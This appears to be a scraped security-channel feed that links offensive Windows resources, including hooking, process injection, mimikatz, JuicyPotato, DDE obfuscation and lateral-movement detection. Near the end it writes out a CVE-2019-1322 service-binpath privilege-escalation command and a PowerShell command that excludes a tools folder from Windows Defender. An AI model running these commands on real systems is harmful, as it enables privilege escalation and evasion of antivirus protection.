https://www.malwaretech.com/2015/01/inline-hooking-for-programmers-part-2.html
#Windows_API_Hooking
#Malware
#PoC
Malwaretech
Inline Hooking for Programmers (Part 2: Writing a Hooking Engine)
We’ll be writing a hooking engine using trampoline based hooks as explained in the previous article (we don’t handle relative instructions as they’re very rare, but we do use atomic write operations to prevent race conditions).
First things first, we need…
Windows Process Injection: PROPagate
https://modexp.wordpress.com/2018/08/23/process-injection-propagate/
#windows
#exploit
@sec_nerd_en
modexp
Windows Process Injection: PROPagate
Introduction In October 2017, Adam at Hexacorn published details of a process injection technique called PROPagate. In his post, he describes how any process that uses subclassed windows has the po…
Attack Methods for Gaining Domain Admin Rights in Active Directory
https://adsecurity.org/?p=2362
#windows
#ad
@sec_nerd_en
Just released a new #mimikatz version to support Windows 10 1803 to bypass the Credential Guard authentication chain
https://github.com/gentilkiwi/mimikatz/releases
#windows
#mimikatz
A personal favorite technique post-compromise, C# PoC for executing processes with a different PPID and retrieving output
https://github.com/leoloobeek/csharp
#windows
#csharp
GitHub
GitHub - leoloobeek/csharp: Various C# projects for offensive security
Various C# projects for offensive security. Contribute to leoloobeek/csharp development by creating an account on GitHub.
JuicyPotato - A useful tool to Escalate from Windows Service Account to NT AUTHORITY\SYSTEM
ohpe.it/juicy-potato/
#windows
@sec_nerd_en
Windows 10 Updates from September 2018 vs. Metasploit - Some fun with Windows Defender and Mimikatz
https://www.youtube.com/watch?v=cq-tgcmMHXU&feature=youtu.be
#windows
YouTube
Windows 10 update from September 2018 vs. Metasploit
Windows 10 x86_64 ver 10.0.17134.286 build vs. Metasploit
Detecting Lateral Movements in Windows Infrastructure
http://cert.europa.eu/static/WhitePapers/CERT-EU_SWP_17-002_Lateral_Movements.pdf
#windows
#security
https://sid-500.com/downloads/
Here you can find a collection of my PowerShell scripts and modules. Have fun with it!
#windows
#ps
SID-500.COM
Downloads
Welcome to the downloads section! Here you can find a collection of my PowerShell scripts and modules. Active Directory Domain Services Section (1.1) AD SectionDownload Alert me, if a DC is do…
Three New DDE Obfuscation Methods
https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation
#office
#windows
ReversingLabs
Three New DDE Obfuscation Methods
Cisco Talos and ReversingLabs discover a new spam campaign spreading the Adwind 3.0 remote access tool (RAT), ReversingLabs details three new DDE obfuscation methods.
DbgShell - A PowerShell Front-End For The Windows Debugger Engine http://bit.ly/2O7c30o #infosec #hacking #hackers #pentesting #pentest #programming #opensource #powershell #Windows
Forwarded from امنیت اطلاعات
PowerShell: Get Last Domain Logon with Get-ADUserLastLogon
https://sid-500.com/2019/08/12/powershell-get-last-domain-logon-with-get-aduserlastlogon/
#windows
#ps
#security
@sec_nerd
On modern #Windows systems one can capture traffic without a sniffer, just by the "netsh trace start capture=yes" command => ETL file created.
Forwarded from امنیت اطلاعات
CVE-2019-1322
as service user "sc config usosvc binpath= evil.exe" the easiest way eop from service user to system, worked for more than 1 year!
https://twitter.com/decoder_it/status/1193496591140818944?s=20
Not tested!
#windows
#privesc
#pentest
@sec_nerd
Twitter
ap
CVE-2019-1322 as service user "sc config usosvc binpath= evil.exe" the easiest way eop from service user to system, worked for more than 1 year!
Add a file/folder to #Windows Defender exclusion list
C:\>powershell -exec bypass - "Add-MpPreference -ExclusionPath 'D:\EvilFolder\Tools'"
useful if you want to move #pentest tools to a Windows machine without Defender interfering
Admin UAC prompt required
#powershell #oscp